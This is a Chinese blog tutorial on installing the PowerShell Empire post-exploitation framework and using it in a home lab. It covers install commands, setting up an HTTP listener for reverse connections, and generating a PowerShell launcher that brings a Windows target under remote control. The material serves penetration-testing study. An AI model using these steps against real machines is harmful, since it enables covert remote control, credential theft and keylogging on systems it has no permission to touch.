後滲透利器Empire的安裝與使用

後滲透利器Empire的安裝與使用

來自專欄 網路安全大事件

0x00 前言

今天和一位黑闊前輩約了個飯,收穫很多,沒有安全會議的高談闊論,更多的是可以了解到很多已經落地的技術!站在前人的肩膀上可以走的更遠,偶然聊到我有沒有用過Empire,之前只是簡單了解了下,本地測試過,並未深究。我理解的就是基於Powershell的遠控,前輩又再一次提到了它,可見Empire不一般。吃完飯回來趁熱學習一波,打算深入分析下。

在這篇文章中我會對Empire的安裝、常見的使用方法、應用場景等方面做一個簡單的介紹。

0x01 基礎環境

Ubuntu 16.04.3 LTS

Microsoft Windows 10 企業版(靶機)

Empire 2.4

0x02 Empire的簡單介紹及安裝

先來看一下Empire官網的介紹:

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

大意是:Empire是基於PowerShell的後滲透框架,其具有靈活的架構,加密的通信方式,實現了無需powershell.exe即可運行PowerShell代理的功能。便捷地部署後滲透模塊(包括鍵盤記錄器、Mimikatz等),同時通信過程可以繞過IDS的網路流量監控。

簡單來講Empire是一個遠控,基於PowerShell,主要應用於後滲透領域,同時具有殺軟繞過的能力。當然具體效果如何,還是要用起來才知道。

說一說Empire的安裝:

第1步:將項目clone至本地

git clone https://github.com/EmpireProject/Empire.git

第2步:安裝並啟動

安裝:

cd Empirecd setup./install.sh

啟動

cd .../empire

0x03 Empire的使用

由於listener、stager、module都擁有較多的模塊,不能依依舉例,所以這裡僅挑一種說下Empire的使用流程。

首先要弄清楚Empire由listeners、stagers、agents、modules這4部分組成。

listeners就是監聽器,服務端設置listeners,即綁定一個指定的埠,等待目標機器反向連接。stagers相當與一個木馬客戶端,執行後將反連至服務端的listeners,此時就形成了一個agents,服務端可以通過各種modules向客戶端下髮指令,同時接收返回信息。

so,第1步:設置listeners

uselistener httpset Name Fuck_testset Host 1xx.xx.xxx.xxx:12348set Port 12348executeback # 返回上一級

第2步:生成stagers

生成stagers有兩種方法

1:usestager

2:launcher powershell Fuck_test(listeners的名字)

由於時間的關係,這裡演示下第2種方法。

第3步:靶機執行生成的代碼,建立agents

可以看到靶機已經上線了。

第4步:查看agents信息,確認靶機是否上線(modules等我以後搭建了域環境再測試)

0x04 後記

簡單記錄下使用過程,更多實用功能,日後慢慢探索~時間不早了,睡覺

0x05 參考鏈接

安全客 - 有思想的安全新媒體

EmpireProject/Empire

安全客 - 有思想的安全新媒體

安全客 - 有思想的安全新媒體

PowerShell Empire


推薦閱讀:

看我如何找到Deutche Telekom本地包含漏洞(LFI)
NO.3 OWASP——感覺看完整本就能當WEB安全測試工程師了呢
Chaos:Linux後門捲土重來
惡意安卓組件致遊戲傳播惡意廣告,450萬用戶受影響
惡意軟體偽裝成遊戲攻略應用偷跑廣告,Google Play商店數十萬用戶中招

TAG:滲透測試 | 網路安全 | 信息安全 |